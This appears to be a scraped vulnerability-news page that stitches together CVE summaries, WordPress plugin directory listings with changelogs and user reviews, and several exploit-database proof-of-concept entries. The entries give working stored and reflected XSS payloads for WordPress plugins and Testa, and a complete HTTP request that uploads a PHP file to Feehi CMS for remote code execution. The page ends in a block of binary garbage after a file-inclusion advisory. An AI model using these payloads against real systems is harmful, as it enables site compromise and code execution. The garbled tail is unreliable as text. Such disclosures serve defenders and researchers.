Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php.

CVE-2022-40359

Cross-Site Request Forgery (CSRF) vulnerability in Customer Reviews for WooCommerce plugin <= 5.3.5 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Happy customers are your best marketers. So why not ask them to leave a review?**

Send an automated, personalized email reminder to each customer after a transaction – make reviewing easier than ever before!

Enhance the standard WooCommerce reviews with extra features, and reassure customers by having their questions answered with a Q&A section on product pages.

The **Customer Reviews for WooCommerce** plugin helps you increase engagement, build loyalty, improve SEO, and get more sales with social proof.

**Localized to over 40 languages and installed on over 50,000 stores!**

The plugin includes an optional integration with an external service to verify customer reviews. **CusRev** collects reviews from customers and verifies their authenticity.

You can find information about **CusRev**‘s terms, privacy, and data protection policies on our website.

**🔥 Main Features**

*   Automated or manual review reminder emails
*   Aggregated review forms to allow quick and easy reviewing
*   Enhanced reviews, including ratings, images, voting and filtering options
*   Offer discounts in exchange for reviews
*   Integration with Google Shopping
*   Question and Answer feature, allowing customers to ask and answer FAQs
*   Import and export reviews

**✉️ Review Reminders – Make Reviewing Easy**

**Customer Reviews for WooCommerce** makes reviewing simple.

You can easily set it to send out review collection emails, days or weeks after purchase. The review form makes it as simple as possible for the customer to leave a review.

It’s an easy process:

1.  Your customer places an order.
2.  You fulfill the order and mark it as completed.
3.  After a delay (customizable by you), your customer receives our automated review request email.
4.  The customer leaves a review for all of their purchases on our aggregated form. Reviews can include ratings and images to increase trust.
5.  The review is exported to WooCommerce and published on your site.

You can even choose to automatically send the customer a discount code for future purchases as a thank you.

Plus, benefit from:

*   A one-page review form where customers can review multiple items in one go
*   Manual email invitations for selected orders
*   Personalized emails for each customer with built-in variables
*   Emails restricted for particular categories of products or customers with specific user roles
*   Quick and easy functionality thanks to a responsive email template and custom colors
*   An Unsubscribe option
*   A built-in testing tool to ensure emails look beautiful before sending
*   Reminders in different languages via “qTranslate X”, “Polylang” and “WPML” plugin integration
*   Support for custom WooCommerce order statuses

**💸 Boost Sales – With Extra Features**

Did you know that displaying reviews can increase conversion by 270%?

Reviews show that people can trust your site. Other people have bought from you before, and it went so well that they want to share their experience. That social proof is important. Customers need to know your product images and descriptions can be trusted. They need to know their bank account is safe.

Turn your visitors into customers by displaying reviews!

Plus, benefit from:

*   Enabling customers to attach pictures to reviews
*   Preventing spam by enabling reCAPTCHA for reviews
*   Showing reviews summary bar on product pages
*   Filtering reviews by rating
*   Enabling visitors to vote on reviews left by your customers
*   Lazy loading of reviews and attached pictures
*   Sorting reviews by date or votes
*   Review tagging
*   Trust Badges that show a summary of verified customer reviews
*   Built-in shortcodes to display a responsive list, grid, or slider of reviews on any page or post

**🔎 Boost SEO – The Automated Way**

Google loves something new! Add new content to your site automatically with customer reviews.

Show off review ratings directly in Google searches, and boost your site’s clickthrough rate.

Plus, benefit from:

*   Getting unique, user-generated SEO content for your shop – customer reviews often contain long tail keywords
*   Building user-generated content (UGC) such as photos and videos uploaded by your customers
*   Enhancing rich snippets and structured data markup for reviews with pictures
*   Enhancing the standard WooCommerce structured data markup with product identifiers (GTIN, MPN, Brand)

**😀 Boost Engagement – With Better Feedback**

Customers believe that only 8% of companies deliver a great experience – but that can change!

Use reviews to get direct feedback from your customers. Find out the good and bad parts of their experience.

You can make business decisions based on the feedback you receive and keep your customers happy.

Plus, benefit from:

*   Receiving feedback for multiple products at once with aggregated review forms
*   Personalized email templates
*   Enabling customers to vote on past reviews

**🚀 Boost Loyalty – Grow Your Repeat Business**

Market to your existing customers!

It’s simple: our review reminders keep you in the forefront of their minds, and offering coupon codes for future purchases gets them back to your store.

It’s easy for a customer to leave a review and receive their coupon, which creates a double whammy effect: the customer comes back for more, and you gain valuable feedback. Maybe they’ll even gift the voucher to a friend!

Plus, benefit from:

*   Automatically generating new coupons for ongoing customer reviews
*   Fair rules for coupon creation – customers will be awarded with a coupon regardless of how positive or negative their review is
*   Automatic emails with coupons upon review submission
*   Personalizing emails with coupons for each customer using built-in variables
*   Fine-tuning coupon properties according to your sales strategy
*   Working out-of-the-box with a responsive email template with custom colors
*   A built-in testing tool to ensure emails look beautiful before sending
*   Emailing coupons in different languages via “qTranslate X”, “Polylang”, and “WPML” plugin integration

**🤔 Reassure Customers – With Questions & Answers**

There’s nothing more reassuring to customers than having their questions answered – with Customer Reviews for WooCommerce you can do just that by:

*   Adding a tab with Questions & Answers or FAQs to product pages on your website
*   Letting your prospective customers ask questions about products and view questions others have asked
*   Increasing sales by answering questions and making sure prospective customers have all the information available to make a purchase decision
*   Reducing return and refund requests by providing answers to common questions about products, as well as offering extra information to avoid any potential misunderstanding of product features or benefits
*   Improving SEO with content created by your customers – that in turn helps search engines better understand and index your website
*   Sending email notifications to customers about replies to their questions and making them come back to your website

**🛒 Google Shopping Integration**

*   Generate an XML feed with products for Google Shopping
*   Generate an XML feed with product reviews for Google Shopping
*   Show star ratings in Google Shopping search results

**⬇ Import and Export Reviews**

Want to add product reviews from external websites? No problemo.

Just use the import reviews feature, which automatically creates reviews in WooCommerce based on a CSV file.

Similarly, you can export WooCommerce reviews to a CSV file.

**Quick and Easy Set-Up**

1.  Make sure that WooCommerce is installed.
2.  Then, just follow the Getting Started Tutorial on our official support portal or watch the video tutorial.

**Get Even More Features – With the Pro Version**

**CusRev** has two plans: Free and Pro. The Pro plan offers additional features and email support – to find out more and purchase a license, please visit CusRev’s website.

This plugin provides 1 block.

*   Reviews Grid Block showing a grid with WooCommerce product reviews.

1.  Make sure that WooCommerce plugin is installed and activated. If it is not installed, please install WooCommerce. Our plugin will not work without WooCommerce.
2.  Upload the plugin files to the /wp-content/plugins directory, or install the plugin through the WordPress ‘Plugins’ screen directly.
3.  Activate the plugin through the ‘Plugins’ screen in WordPress
4.  Go the Reviews > Settings in WordPress admin area to configure the plugin

**I found a bug in the plugin. How to get it fixed?**

Please create a new topic at the support forum and provide detailed information with a screenshot.

**How to get Site Key and Secret Key for reCAPTCHA?**

Please visit reCAPTCHA website and sign up for an account. Then, you will be able to get API key pair (Site Key and Secret Key) for your website. Copy these keys and paste into the settings of the plugin.

**Will collected reviews be shown as stars in Google?**

The standard WooCommerce functionality already includes structured data mark up to display your product reviews effectively within organic search results. This plugin extends the standard functionality and adds some extra mark up to help search engines properly crawl your shop. It is important to understand that having a valid structured data mark up in place makes your website eligible for organic stars in Google but it doesn’t guarantee that they will be shown. You can test the rich snippets using Google’s Structured Data Testing Tool.

**How to customize template of the reviews on a single product page?**

The plugin uses the standard reviews template provided by WooCommerce and enhances it with the reviews summary bar. If your theme requires a customized reviews template or you would like to use a customized reviews template for some other reason, it is possible to do so. Here is how to do it:  
1) Create a folder ‘customer-reviews-woocommerce’ in your current theme’s folder.  
2) Copy file ‘ivole-single-product-reviews.php’ from ‘templates’ subfolder in the plugin’s folder to the folder created at step 1.  
3) Customize the file ‘ivole-single-product-reviews.php’ in the current theme’s folder according to your requirements.

**How to Change Sorting of Reviews?**

If you would like to change how reviews are sorted on product pages, it is possible to do so using the standard WordPress functionality. Go to Settings -> Discussion menu and find options “Break comments into pages with X top level comments per page and the last/first page displayed by default” and “Comments should be displayed with the older/newer comments at the top of each page”. You can control how reviews are sorted and displayed on product pages by modifying these options.

Hi, When I submit Google Product Reviews XML Feed, Google prompts me the error: Missing or invalid product\_id, Missing product\_url Is there any way to map them? So thanks!

I'm using it since 2 years, and it's great. I'd recommend it to every e-commerce owner.

Love the Google shopping feature as well.

Funciona muy bien, en estos dos años no hemos tenido problemas con el plugin

Read all 1,162 reviews

“Customer Reviews for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    cusrev

**5.3.7**

*   Bug fixes and minor improvements

**5.3.6**

*   Bug fixes and minor improvements

**5.3.5**

*   Bug fixes and minor improvements

**5.3.4**

*   Bug fixes and minor improvements

**5.3.3**

*   Bug fixes and minor improvements

**5.3.2**

*   Bug fixes and minor improvements

**5.3.1**

*   Bug fixes and minor improvements

**5.3.0**

*   New feature: responsive design for local review forms
*   Bug fixes and minor improvements

**5.2.1**

*   Bug fixes and minor improvements

**5.2.0**

*   New feature: an age restriction option for verified reviews pages of stores selling age-restricted products
*   CSS enhancements – if you use any caching plugins, please clear cache after installing the update
*   Bug fixes and minor improvements

**5.1.2**

*   Bug fixes and minor improvements

**5.1.1**

*   Bug fixes and minor improvements

**5.1.0**

*   New feature: image and video attachments for reviews submitted via local aggregated review forms
*   Bug fixes and minor improvements

**5.0.0**

*   New feature: Local aggregated review forms to collect customer reviews without third-party verification by CusRev
*   New feature: Traditional and Simplified Chinese language support
*   New feature: support of \[sale\_price\] and \[sale\_price\_effective\_date\] attributes for Google Shopping XML product feed
*   Bug fixes and minor improvements

**4.46**

*   Bug fixes and minor improvements

**4.45**

*   Bug fixes and minor improvements

**4.44**

*   Bug fixes and minor improvements

**4.43**

*   New feature: email notifications about replies to Q & A
*   Bug fixes and minor improvements

**4.42**

*   Bug fixes and minor improvements

**4.41**

*   Improved compatibility with Polylang

**4.40**

*   Bug fixes and CSS improvements

**4.39**

*   New feature: an option to sort a grid with reviews by the number of attached images (‘sort\_by’ parameter)
*   Bug fixes and minor improvements

**4.38**

*   Bug fixes and minor improvements

**4.37**

*   Bug fixes and minor improvements

**4.36**

*   New feature: enhanced UI for review tagging in the Admin Dashboard
*   Bug fixes and minor improvements

**4.35**

*   New feature: filter reviews by rating in the Admin Dashboard
*   Bug fixes and minor improvements

**4.34**

*   New feature: filter Product and Store reviews in the Admin Dashboard
*   Bug fixes and minor improvements

**4.33**

*   New feature: view breakdown of reviews by rating on the XML feed status page
*   New feature: like and dislike buttons to display votes for reviews
*   Bug fixes and minor improvements

**4.32**

*   Bug fixes and minor improvements

**4.31**

*   New feature: a diagnostics report about hidden reviews linked to products deleted in WooCommerce
*   Bug fixes and minor improvements

**4.30**

*   New feature: automatic download of videos attached by customers via aggregated review forms into the local WordPress Media Library
*   Bug fixes and minor improvements

**4.29**

*   Bug fixes and minor improvements

**4.28**

*   New feature: automatic download of images attached by customers via aggregated review forms into the local WordPress Media Library
*   Bug fixes and minor improvements

**4.27**

*   New feature: HTML implementation of Trust Badges (supports customizations via templates)
*   Bug fixes and minor improvements

**4.26**

*   New feature: download and save local copies of videos attached by customers via aggregated review forms (from the ‘Reviews’ page in admin area)
*   Bug fixes and minor improvements

**4.25**

*   New feature: a setting to create avatars with customer initials on WooCommerce single product pages
*   New feature: download and save local copies of images attached by customers via aggregated review forms (from the ‘Reviews’ page in admin area)
*   Bug fixes and minor improvements

**4.24**

*   New feature: use discount tiers to offer customers different coupons depending on how many photos/videos they uploaded with reviews
*   Bug fixes and minor improvements

**4.23**

*   New feature: a search bar for \[cusrev\_all\_reviews\] shortcode
*   Bug fixes and minor improvements

**4.22**

*   New feature: allow customers to share their discount coupons with other people
*   New feature: exclude out-of-stock products from XML feeds for Google Shopping
*   Bug fixes and minor improvements

**4.21**

*   New feature: create avatars with customer initials in \[cusrev\_reviews\_slider\] and \[cusrev\_reviews\_all\] shortcodes
*   Bug fixes and minor improvements

**4.20**

*   New feature: create avatars with customer initials in \[cusrev\_reviews\_grid\] shortcode and Gutenberg block
*   Bug fixes and minor improvements

**4.19**

*   New feature: display of images uploaded by customers in \[cusrev\_reviews\_grid\] shortcode and Gutenberg block
*   Bug fixes and minor improvements

**4.18**

*   New feature: import of reviews from CSV files with semicolon separators
*   Bug fixes and minor improvements

**4.17**

*   New feature: \[cusrev\_qna\] shortcode to display Q&A block on any page or post
*   Bug fixes and minor improvements

**4.16**

*   New feature: visual enhancement for the admin area to display bubbles with counts of reviews and Q&A pending moderation
*   Bug fixes and minor improvements

**4.15**

*   New feature: improved upload of images for reviews left on WooCommerce product pages
*   Bug fixes and minor improvements

**4.14**

*   New feature: add a “featured” label to reviews and pin them to the top (requires “Lazy Load Reviews” option)
*   Bug fixes and minor improvements

**4.13**

*   New feature: restrict sending of discount coupons to selected user roles
*   Bug fixes and minor improvements

**4.12**

*   New feature: “show\_summary\_bar” parameter for \[cusrev\_reviews\_grid\] shortcode
*   Bug fixes and minor improvements

**4.11**

*   New feature: “show\_dots” parameter for \[cusrev\_reviews\_slider\] shortcode
*   New feature: attach pictures to existing reviews from WordPress admin area
*   Bug fixes and minor improvements

**4.10**

*   New feature: support of additional attributes on the XML product feed for Google Shopping (‘color’, ‘gender’, and ‘age\_group’)
*   Bug fixes and minor improvements

**4.9**

*   New feature: “min\_chars” parameter for \[cusrev\_all\_reviews\], \[cusrev\_reviews\_grid\], and \[cusrev\_reviews\_slider\] shortcodes. Use it to set the minimum number of characters that a review must have to be displayed. If this argument is “0”, then all reviews (including rating-only reviews) will be displayed.
*   Bug fixes and minor improvements

**4.8**

*   New feature: “Show more” button can be added to \[cusrev\_all\_reviews\] shortcode to replace pagination
*   Bug fixes and minor improvements

**4.7**

*   New feature: improved summary of reviews on product pages and in \[cusrev\_all\_reviews\] shortcode
*   Bug fixes and minor improvements

**4.6**

*   New feature: ‘product\_tags’ parameter for \[cusrev\_all\_reviews\], \[cusrev\_reviews\_grid\], and \[cusrev\_reviews\_slider\] shortcodes
*   Bug fixes and minor improvements

**4.5**

*   New feature: display count of answered questions next to the product rating and under the product name
*   Bug fixes and minor improvements

**4.4**

*   New feature: lazy loading attribute for pictures uploaded by customers
*   New feature: ‘Show more’ button to fetch and display additional Q & A on product pages
*   New feature: Search for Q & A on product pages
*   Bug fixes and minor improvements

**4.3**

*   New feature: verified owner and store manager badges for Q & A
*   Bug fixes and minor improvements

**4.2**

*   New feature: upvote and downvote for Q & A
*   Bug fixes and minor improvements

**4.1**

*   New feature: {customer\_last\_name} variable for email templates
*   New feature: add answers to questions from the frontend
*   New feature: reCAPTCHA for questions and answers
*   Bug fixes and minor improvements

**4.0**

*   New feature: questions and answers
*   Bug fixes and minor improvements

CVE-2022-38470: Customer Reviews for WooCommerce

Multiple Stored Cross-Site Scripting (XSS) via Cross-Site Request Forgery (CSRF) vulnerability in 3D Tag Cloud plugin <= 3.8 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of September 22, 2022 and is not available for download. This closure is temporary, pending a full review.

I have been using this plugin for years now--beginning with PHP 5.6.X, and currently running under WP v5.9.X and PHP 7.4.X. I have also done a local Laragon dev under PHP 8.1.X and it still rolls on! It is completely configurable to mimic the CSS of your theme--and while is a bit of useful fluff--it certainly adds charm to a WP site.

The use of 'wp\_head' hook to inject javascript code that requires jQuery may fail. I changed it to 'wp\_footer' Calling jQuery.noConflict() also makes other parts of the website that use $ to call jQuery fail. It is really unnecessary to call .noConflict() so I recommend removing it.

I Like it. Actually, it made me clean up my tag DB just to be able to use it 🙂

The new version of this plugin avails the options under the Settings Menu under 3D Tag Cloud. A quick update of the settings and adding a few quick tags to the posts gave me a nice addition to alternative prism view of my site. I love it. I use in on GiantLeap.com for now and will add to others I am sure.

in the new Version this Plugin is full OK. I say Thank you for this Plugin, i use this on my Site.

Great idea, but not customizable with no options for colours, different tags, and locations (i.e. sidebar, bottom, etc). It seems to also have a bug that remains on different pages.

Read all 23 reviews

“3D Tag Cloud” is open source software. The following people have contributed to this plugin.

Contributors

*    Vinoj Cardoza

CVE-2022-36417: 3D Tag Cloud

Unauthenticated Plugin Settings Change vulnerability in Awesome Filterable Portfolio plugin <= 1.9.7 at WordPress.

*   Details
*   Reviews
*   Development

This plugin has been closed as of September 14, 2022 and is not available for download. Reason: Security Issue.

I try on WP 4.8.3 with Twenty Seventeen basic theme and it not work. :-((

Well done, but why don't make items open in a lightbox?

Notice: Undefined index: item\_id in .../wp-content/plugins/awesome-filterable-portfolio/afp.php on line 395 Notice: Undefined index: action in .../wp-content/plugins/awesome-filterable-portfolio/afp.php on line 396 Notice: Undefined index: cat\_sorting in .../wp-content/plugins/awesome-filterable-portfolio/afp.phpbon line 1133 Warning: Cannot modify header information - headers already sent by (output started at .../wp-content/plugins/awesome-filterable-portfolio/afp.php:1133) in /.../wp-content/plugins/awesome-filterable-portfolio/afp.php on line 1143 and some others The Frontend looks like a standard unstyled ... something is wrong here. Cannot use this...sorry...

Good one, I like this plugin

Only shows the shortcode on the page. Error handling is hopeless. When forgetting to set a thumbnail, the pages shows: "Array ( \[dirname\] => /ya/dee.ya.da/duh/barf/uploads/2016/07 \[basename\] => 009\_Landscape\_001\_small.jpg \[extension\] => jpg \[filename\] => 009\_Landscape\_001\_small ) Why not use wordpress´ hooks functions to read the thumbnail. It all seems a bit amateuristic.

Hello everyone . Its working good in start.. I add the images also to each category . When you click on next tab plugin stop working.. any one can solve this problem??

Read all 52 reviews

“Awesome Filterable Portfolio” is open source software. The following people have contributed to this plugin.

Contributors

*    BriniA

CVE-2022-35238: Awesome Filterable Portfolio

WordPress 3dady Real-Time Web Stats plugin version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/# Date: 2022-08-24# Exploit Author: UnD3sc0n0c1d0# Vendor Homepage: https://profiles.wordpress.org/3dady/# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip# Category: Web Application# Version: 1.0# Tested on: Debian / WordPress 6.0.1# CVE : N/A# 1. Technical Description:The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of JavaScript code that can exploit the vulnerability.  # 2. Proof of Concept (PoC):  a. Install and activate version 1.0 of the plugin.  b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).  c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):    " autofocus onfocus=alert(/XSS/)>  d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.  Note: This change will be permanent until you modify the edited fields.

WordPress 3dady Real-Time Web Stats 1.0 Cross Site Scripting

The Image Hover Effects Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title & Description values that can be added to an Image Hover in versions up to, and including, 9.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, the plugin only allows administrators access to edit Image Hovers, however, if a site admin makes the plugin's features available to lower privileged users through the 'Who Can Edit?' setting then this can be exploited by those users.

CVE-2022-2937: Vulnerability Advisories - Wordfence

WordPress WP-UserOnline plugin version 2.88.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)# Google Dork: inurl:/wp-content/plugins/wp-useronline/# Date: 2022-08-24# Exploit Author: UnD3sc0n0c1d0# Vendor Homepage: https://github.com/lesterchan/wp-useronline# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip# Category: Web Application# Version: 2.88.0# Tested on: Debian / WordPress 6.0.1# CVE : CVE-2022-2941# Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c# 1. Technical Description:The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user accesses the injected page.  # 2. Proof of Concept (PoC):  a. Install and activate version 2.88.0 of the plugin.  b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings).  c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use     the following payload:    <script>alert(/XSS/)</script>  d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload      will be executed.Note: This change will be permanent until you modify the edited fields.

WordPress WP-UserOnline 2.88.0 Cross Site Scripting

Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)# Date: 22-08-2022# Exploit Author: yuyudhn# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Docker# CVE : CVE-2022-34140# Proof of Concept:1. Login using admin account at http://feehi-cms.local/admin2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php# Burp request example:POST /admin/index.php?r=ad%2Fcreate HTTP/1.1Host: feehi-cms.localContent-Length: 1530Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://feehi-cms.localContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://feehi-cms.local/admin/index.php?r=ad%2FcreateAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7DConnection: close------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="_csrf_backend"FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[name]"rce------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[tips]"rce at Ad management------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[input_type]"1------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"Content-Type: image/png<?php phpinfo();------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[link]"--------------

Feehi CMS 2.1.1 Remote Code Execution

Testa Online Test Management System version 3.5.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)# Date: 28/08/2022# Exploit Author: Ashkan Moghaddas# Vendor Homepage: https://testa.cc# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip# Version: 3.5.1# Tested on: Windows/Linux# Proof of Concept:# 1- Install Testa 3.5.1# 2- Go to https://localhost.com/login.php?redirect=XXXX# 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E# 4- XSS has been triggered.# Go to this url "https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E"XSS will trigger.

Testa 3.5.1 Cross Site Scripting

A remote file inclusion (RFI) vulnerability in Simple College Website v1.0 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is exploitable when the directive allow_url_include is set to On.

�=gGI#Be��ȹȆ��ޡ��G��W��/�xG���UP��s�伶4sק�h�y����o���tŠF�6,�$v&�������z���,� -���a�(t=�י���>�s�l?��WTv:����1L\_�#�UI\]� O�ziC&��>D���Vt�z}���@07ׅ�!����8�ʁ�|V��Y?R\[T�~����w��e�ݭ��e�5�C��^������8T��eRa}��v��o���艃�DJ�$ <\]uʵ�IE� |� �Y���\`x�bD�4�+ =�KۛIXK��a��e\[�@�N��֥2�FV4v�Q;��'��xp>b(D�FȔ��!�H�r��<m(�/9p�Zx���5��LXe���x�vs1<\`n��7�0���^4��1���\[�ԡ �J2L~��^FQ\`#|#Z����K^���ng�4Hj�)�I�����Pa��q����#s����=�ԋ��ϖ T'Ī��1�!�qޡ��y\_R�%�FP�=�W;���-�lE� ��jZ����:������ӹ�42�%��������>�"2�F>�5~��J���hZ>K���F�U�ڗ����0�\\T'�S��)}.|\_�)�)c�Pp�6ߵ�x�7��$G�s���G�p���{��V6�\\6��Ɖ?\]�w�?M5n�bz�VfC5f��\[U��H�n�;�TI����$��=ȑ��r7ď��i�K)j0)G!�!

Tag

#php